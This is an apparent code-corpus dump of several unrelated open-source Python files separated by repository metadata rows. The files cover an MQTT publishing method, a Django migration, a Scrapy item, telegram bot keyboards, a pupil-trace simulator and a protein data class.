password=None, *args, **kwargs):
"""
Sends a message to a topic/channel.
:param topic: Topic/channel where the message will be delivered
:type topic: str
:param msg: Message to be sent. It can be a list, a dict, or a Message object
:param host: MQTT broker hostname/IP
:type host: str
:param port: MQTT broker port (default: 1883)
:type port: int
:param tls_cafile: If TLS/SSL is enabled on the MQTT server and the certificate requires a certificate authority to authenticate it, `ssl_cafile` will point to the provided ca.crt file (default: None)
:type tls_cafile: str
:param tls_certfile: If TLS/SSL is enabled on the MQTT server and a client certificate it required, specify it here (default: None)
:type tls_certfile: str
:param tls_keyfile: If TLS/SSL is enabled on the MQTT server and a client certificate key it required, specify it here (default: None)
:type tls_keyfile: str
:param tls_version: If TLS/SSL is enabled on the MQTT server and it requires a certain TLS version, specify it here (default: None)
:type tls_version: str
:param tls_ciphers: If TLS/SSL is enabled on the MQTT server and an explicit list of supported ciphers is required, specify it here (default: None)
:type tls_ciphers: str
:param username: Specify it if the MQTT server requires authentication (default: None)
:type username: str
:param password: Specify it if the MQTT server requires authentication (default: None)
:type password: str
"""
import paho.mqtt.publish as publisher
if not host and not self.host:
raise RuntimeError('No host specified and no default host configured')
publisher_args = {
'hostname': host or self.host,
'port': port or self.port,
}
if host:
if username and password:
publisher_args['auth'] = {
'username': username,
'password': password,
}
else:
if self.username and self.password:
publisher_args['auth'] = {
                    'username': self.username,
                    'password': self.password,
}
if host:
if tls_cafile:
publisher_args['tls'] = { 'ca_certs': tls_cafile }
if tls_certfile:
publisher_args['tls']['certfile'] = tls_certfile
if tls_keyfile:
publisher_args['tls']['keyfile'] = tls_keyfile
if tls_version:
publisher_args['tls']['tls_version'] = tls_version
if tls_ciphers:
publisher_args['tls']['ciphers'] = tls_ciphers
else:
if self.tls_cafile:
publisher_args['tls'] = { 'ca_certs': self.tls_cafile }
if self.tls_certfile:
publisher_args['tls']['certfile'] = self.tls_certfile
if self.tls_keyfile:
publisher_args['tls']['keyfile'] = self.tls_keyfile
if self.tls_version:
publisher_args['tls']['tls_version'] = self.tls_version
if self.tls_ciphers:
publisher_args['tls']['ciphers'] = self.tls_ciphers
try: msg = json.dumps(msg)
except: pass
try: msg = Message.build(json.loads(msg))
except: pass
publisher.single(topic, str(msg), **publisher_args)
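# Example usage (a minimal sketch; the broker host and topic are hypothetical):
#
#     plugin = MqttPlugin(host='broker.example.org')
#     plugin.send_message('platypush/sensors', {'temperature': 21.5})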
# vim:sw=4:ts=4:et:
| UTF-8 | Python | false | false | 6,344 | py | 7 | mqtt.py | 3 | 0.598203 | 0.595366 | 0 | 162 | 38.154321 | 208 |
Shershebnev/SDCND | 14,362,370,680,966 | 7c50e751ae12724d47ac437f24c6636a2f415e7a | 0d83640f61c9d9a2abc84733b95931d3e749c0e0 | /term1/project5/heatmap.py | 4e0d23e111e83e0c5b2685e112b4822c627a2b37 | []
| no_license | https://github.com/Shershebnev/SDCND | 57f1870cc7dfe3ddfe99ed7c332b813cf0433e63 | f1e1d9a02adde01c38727102b6436fc4ce38ee69 | refs/heads/master | 2021-05-01T15:49:28.657444 | 2018-05-26T03:55:37 | 2018-05-27T15:18:29 | 121,038,006 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from collections import deque
import numpy as np
class Heatmap:
"""Class for storing heatmaps from the previous frames
"""
def __init__(self, n_last_heatmaps=3):
"""init
:param n_last_heatmaps: size of frame memory
"""
self.queue = deque(maxlen=n_last_heatmaps)
def sum_heatmap(self):
"""Sum all stored heatmaps
:return: total heatmap as numpy array
"""
        return np.array(self.queue).sum(axis=0)
 | UTF-8 | Python | false | false | 480 | py | 16 | heatmap.py | 10 | 0.60625 | 0.602083 | 0 | 22 | 20.863636 | 58 |
elmiomar/testbed | 18,906,446,053,941 | a5d3c8e4692ffc7d7bde12445dc2fe27e92b0a31 | 94876d26987e31ddc3a939fe02d2150407b00903 | /MainApp/migrations/0004_sensor_xsensoriotcomponent.py | bab6dd7c334f63bec000d096bc14eaad1856fc2f | []
| no_license | https://github.com/elmiomar/testbed | cc5e96f9bb131f232344136b9680215cb65f8c32 | b347cdc0f7f13ddaef45fb633ba44cef315e0b0c | refs/heads/master | 2023-02-25T08:20:48.660433 | 2021-01-25T22:52:37 | 2021-01-25T22:52:37 | 332,906,553 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 3.0.2 on 2020-02-03 19:54
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('MainApp', '0003_iotcomponent_topic'),
]
operations = [
migrations.CreateModel(
name='Sensor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(default='', max_length=255)),
('created_date', models.DateTimeField(auto_now_add=True)),
('deleted_date', models.DateTimeField(null=True)),
],
),
migrations.CreateModel(
name='XSensorIOTComponent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pin_number', models.IntegerField(null=True)),
('created_date', models.DateTimeField(auto_now_add=True)),
('deleted_date', models.DateTimeField(null=True)),
('iot_component', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='MainApp.IOTComponent')),
('sensor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='MainApp.Sensor')),
],
),
]
| UTF-8 | Python | false | false | 1,380 | py | 66 | 0004_sensor_xsensoriotcomponent.py | 64 | 0.586232 | 0.57029 | 0 | 34 | 39.588235 | 125 |
timegambler/-wechatScrapy | 8,383,776,180,279 | d031948d8b583d499d4456798adb0ac8dfb65bdf | bbef5ac140bdfe36e68ae776dfae3cb36a86417d | /run/spidertool/workspace/officialAccountSpiders/items.py | 8adff8792e5d49dade4ead0552915085db8b4d90 | []
| no_license | https://github.com/timegambler/-wechatScrapy | 2fa43f47ca2472b0c86791710e148917712bbb69 | 8afa427901dd5a25d8192a2b960acf8f9dc4e835 | refs/heads/master | 2020-04-24T22:23:54.871189 | 2019-02-24T08:13:41 | 2019-02-24T08:13:41 | 172,310,508 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class officialAccountItem(scrapy.Item):
    nickname = scrapy.Field() # official account name
    article_title = scrapy.Field() # article title
    article_updatetime = scrapy.Field() # publish time
    article_link = scrapy.Field() # article link
    crawl_time = scrapy.Field() # crawl time
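# Example (a minimal sketch; the field values are hypothetical):
#
#     item = officialAccountItem()
#     item['nickname'] = 'Some Official Account'
#     item['article_title'] = 'Hello World'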
| UTF-8 | Python | false | false | 463 | py | 8 | items.py | 7 | 0.67696 | 0.674584 | 0 | 15 | 27 | 52 |
sot/mica | 8,194,797,629,318 | e6f1e9bf58d2d3dded87d80d441a0847e184c1d1 | f839a5b4025952684d72194ee93aa946388d88cd | /scripts/update_guide_stats.py | 28a7388082b407d5638339983ae9162359b8eac7 | [
"BSD-3-Clause"
]
| permissive | https://github.com/sot/mica | f0bf217b707d30e62a32f91e40de806f7b8faca3 | 6f9a7831f22d6797d51e494377ad18279879a0ed | refs/heads/master | 2023-08-31T04:27:39.853169 | 2023-08-22T14:02:12 | 2023-08-22T14:02:12 | 3,139,571 | 0 | 0 | BSD-3-Clause | false | 2023-08-07T13:17:47 | 2012-01-09T19:58:08 | 2021-11-29T16:26:17 | 2023-08-07T13:02:19 | 2,223 | 3 | 0 | 42 | Python | false | false | #!/usr/bin/env python
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import os
import argparse
from mica.stats import update_guide_stats
import mica.stats.guide_stats
# Cheat and pass options directly. Needs entrypoint scripts
opt = argparse.Namespace(datafile=mica.stats.guide_stats.TABLE_FILE,
obsid=None, check_missing=False, start=None, stop=None)
update_guide_stats.update(opt)
table_file = mica.stats.guide_stats.TABLE_FILE
file_stat = os.stat(table_file)
if file_stat.st_size > 200e6:
print("""
Warning: {tfile} is larger than 200MB and may need
Warning: to be manually repacked (i.e.):
Warning:
Warning: ptrepack --chunkshape=auto --propindexes --keep-source-filters {tfile} compressed.h5
Warning: cp compressed.h5 {tfile}
""".format(tfile=table_file))
| UTF-8 | Python | false | false | 813 | py | 103 | update_guide_stats.py | 70 | 0.738007 | 0.725707 | 0 | 25 | 31.52 | 93 |
borissimkin/moneykeeper-bot | 10,539,849,747,751 | 8e2aa211096a7b1389f52efb4721b231b09e3356 | a137d3f7c5956f659c8ce356aac52e22906fbc28 | /bot/conversations/limits/keyboards.py | 3a4c22d09fd05f41b51782f6a7ae94c52ce04f3b | [
"MIT"
]
| permissive | https://github.com/borissimkin/moneykeeper-bot | 33c19d127b34598d54653f0ae05f1999e264e5d7 | 45f7ed92be187db71d28c5326a5b62cb587c88bf | refs/heads/master | 2022-12-07T21:20:15.619429 | 2020-04-17T10:58:30 | 2020-04-17T10:58:30 | 231,085,939 | 2 | 0 | MIT | false | 2022-11-22T05:25:04 | 2019-12-31T12:33:45 | 2022-01-21T13:00:28 | 2022-11-22T05:25:01 | 175 | 1 | 0 | 2 | Python | false | false | from telegram import ReplyKeyboardMarkup
from bot import config
from bot.buttons import Buttons
from bot.keyboards import make_buttons_for_choose_category, row_is_full
from bot.utils import add_button_exit, add_buttons_exit_and_back
text_button_daily = 'Суточный'  # "Daily"
text_button_weekly = 'Недельный'  # "Weekly"
text_button_monthly = 'Месячный'  # "Monthly"
text_button_general_category = 'По всем категориям'  # "All categories"
text_button_type = 'Тип'  # "Type"
text_button_category = 'Категория'  # "Category"
text_button_amount_money = 'Количество денег'  # "Amount of money"
keyboard_main_menu_limits_exist = ReplyKeyboardMarkup(add_button_exit([[Buttons.add, Buttons.delete],
[Buttons.edit]]), resize_keyboard=True)
keyboard_main_menu_limits_non_exist = ReplyKeyboardMarkup(add_button_exit([[Buttons.add]]), resize_keyboard=True)
keyboard_choose_type_limit = ReplyKeyboardMarkup(add_buttons_exit_and_back([[text_button_daily, text_button_weekly],
[text_button_monthly]]),
resize_keyboard=True)
keyboard_choose_action_edit = ReplyKeyboardMarkup(add_buttons_exit_and_back([[text_button_type, text_button_category,
text_button_amount_money]]),
resize_keyboard=True)
def get_keyboard_category_limit(categories):
keyboard_categories = make_buttons_for_choose_category(config['buttons_per_row'], categories)
keyboard_categories.insert(0, [text_button_general_category])
return ReplyKeyboardMarkup(add_buttons_exit_and_back(keyboard_categories),
resize_keyboard=True)
def get_keyboard_main_menu(limits):
return keyboard_main_menu_limits_exist if limits else keyboard_main_menu_limits_non_exist
def make_keyboard_choose_limits(ids_limits: dict):
buttons = make_buttons_for_choose_limits(4, list(ids_limits.keys()))
return ReplyKeyboardMarkup(add_buttons_exit_and_back(buttons), resize_keyboard=True)
def make_buttons_for_choose_limits(count_buttons_per_row, ids):
buttons = []
row = []
for index, category in enumerate(ids):
row.append(str(category))
if row_is_full(index, count_buttons_per_row):
buttons.append(row)
row = []
if row:
buttons.append(row)
return buttons
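# Worked example (assuming row_is_full(i, n) is true on every n-th item):
#
#     make_buttons_for_choose_limits(4, [10, 11, 12, 13, 14, 15])
#     # -> [['10', '11', '12', '13'], ['14', '15']]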
| UTF-8 | Python | false | false | 2,506 | py | 89 | keyboards.py | 85 | 0.639459 | 0.638638 | 0 | 57 | 41.736842 | 117 |
Aasthaengg/IBMdataset | 13,950,053,804,950 | 67c302ef2dcb50ab8710afc15c1175ab2c46e1fd | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03778/s090293313.py | 245125398d062db92596d5a96a074f1d464167ae | []
| no_license | https://github.com/Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | W,a,b=map(int,input().split());print([abs(a-b)-W,0][abs(a-b)<=W])
 | UTF-8 | Python | false | false | 65 | py | 202,060 | s090293313.py | 202,055 | 0.569231 | 0.553846 | 0 | 1 | 65 | 65 |
Galactromeda/baseline-pupil-size-study | 1,460,288,909,311 | 24949b3114d935443f812212a2d2f581544ddbe5 | 09dd7af14e88edaffc2980bd6d35e4a08969a507 | /data/analysis/data.py | adb37373f3115459f5932495f8ad2c8135cc705d | []
| no_license | https://github.com/Galactromeda/baseline-pupil-size-study | 7cd9f9fbb909b876820982f4e50221a4d5b4e1a8 | ff7638271659c879c18ede33d5c0ab65293e75ca | refs/heads/master | 2022-01-02T06:28:19.558444 | 2017-11-29T13:21:25 | 2017-11-29T13:21:25 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # coding=utf-8
import numpy as np
from datamatrix import cached, DataMatrix, SeriesColumn, IntColumn, io
from analysis.constants import *
a = np.loadtxt('data/trace.txt')
@cached
def generatedata(effectsize=EFFECTSIZE, blinksinbaseline=BLINKSINBASELINE,
**kwargs):
dm = DataMatrix(length=TRACES)
dm.c = IntColumn
dm.c[:TRACES//2] = 1
dm.c[TRACES//2:] = 2
dm.y = SeriesColumn(depth=TRACELEN)
dm.y.setallrows(a)
dm.y += np.random.randint(NOISERANGE[0], NOISERANGE[1], TRACES)
dm.y[TRACES//2:] += np.linspace(0, effectsize, TRACELEN)
	# Introduce blinks
for i, row in enumerate(dm):
blinklen = np.random.randint(BLINKLEN[0], BLINKLEN[1], BLINKS)
if i < blinksinbaseline:
blinkstart = np.array([1])
else:
blinkstart = np.random.randint(BASELINE[1], TRACELEN, BLINKS)
blinkend = blinkstart+blinklen
for start, end in zip(blinkstart, blinkend):
end = min(TRACELEN-1, end)
if end-start < 2 * BLINKMARGIN:
continue
row.y[start:start+BLINKMARGIN] = \
np.linspace(row.y[start-1], 0, BLINKMARGIN)
row.y[end-BLINKMARGIN:end] = \
np.linspace(0, row.y[end], BLINKMARGIN)
row.y[start:end] = np.random.randint(0, 100, end-start)
return dm
def realdata():
dm = io.readpickle('data/real-data.pkl')
# If the buffered DataMatrix still uses a list-style row index, we convert
# it to the new Index object with this hack.
if isinstance(dm._rowid, list):
from datamatrix._datamatrix._index import Index
object.__setattr__(dm, u'_rowid', Index(dm._rowid))
print(len(dm))
return dm
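# Example usage (a minimal sketch; TRACES and TRACELEN come from
# analysis.constants):
#
#     dm = generatedata(effectsize=EFFECTSIZE, blinksinbaseline=BLINKSINBASELINE)
#     print(len(dm))     # TRACES rows, half per condition (dm.c is 1 or 2)
#     print(dm.y.depth)  # TRACELEN samples per pupil trace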
| UTF-8 | Python | false | false | 1,531 | py | 22 | data.py | 8 | 0.702155 | 0.687786 | 0 | 50 | 29.62 | 75 |
christellevs/toxinclass_old | 781,684,085,268 | e19eaec723b2d5c99eb8ea5d4f41e6a57e2b64a4 | 53f79149e1dee73a39dc4a436df2ba155437b337 | /protein.py | 5f0f92cf32d6525b28c67e5fbf29926075aac287 | []
| no_license | https://github.com/christellevs/toxinclass_old | 07b8ec28d974eae6f7beac50de89133511c1c390 | 8b56f85504aba9e13cc997553c85aa2eb2c2590a | refs/heads/master | 2022-11-26T19:58:21.312863 | 2020-08-09T19:28:56 | 2020-08-09T19:28:56 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import numpy as np
# PROTEIN PROCESSING FUNCTIONS START
# -----------------------------------------------------------------------------
# PROTEIN CLASS
class Protein:
def __init__(self, identifier, toxic, length, sequence):
self.identifier = identifier
self.toxic = toxic
self.length = length
self.sequence = sequence
self.seq_dict_raw = {}
self.seq_dict_diff = {}
self.matrix_raw = np.zeros((5, length))
self.matrix_diff = np.zeros((5, length))
def _to_dict(self):
"""
Used to easily transform parsed protein data in Dictionary first, and then DataFrame.
"""
return {'identifier': self.identifier,
'toxic': self.toxic,
'length': self.length,
'sequence': self.sequence,
'matrix_raw': self.matrix_raw,
            'matrix_diff': self.matrix_diff,
'f1_raw': self.matrix_raw[0],
'f2_raw': self.matrix_raw[1],
'f3_raw': self.matrix_raw[2],
'f4_raw': self.matrix_raw[3],
'f5_raw': self.matrix_raw[4],
'atchley_raw_avg': np.average(self.matrix_raw, axis=0),
'f1_diff': self.matrix_diff[0],
'f2_diff': self.matrix_diff[1],
'f3_diff': self.matrix_diff[2],
'f4_diff': self.matrix_diff[3],
'f5_diff': self.matrix_diff[4],
'atchley_diff_avg': np.average(self.matrix_diff, axis=0)}
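# Example usage (a minimal sketch; identifier and sequence are hypothetical):
#
#     p = Protein('P12345', 1, 4, 'MKVL')
#     row = p._to_dict()
#     print(row['f1_raw'].shape)  # -> (4,): one value per residue, all zeros here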
# -----------------------------------------------------------------------------
 | UTF-8 | Python | false | false | 1,519 | py | 10 | protein.py | 9 | 0.500987 | 0.485188 | 0 | 48 | 30.645833 | 89 |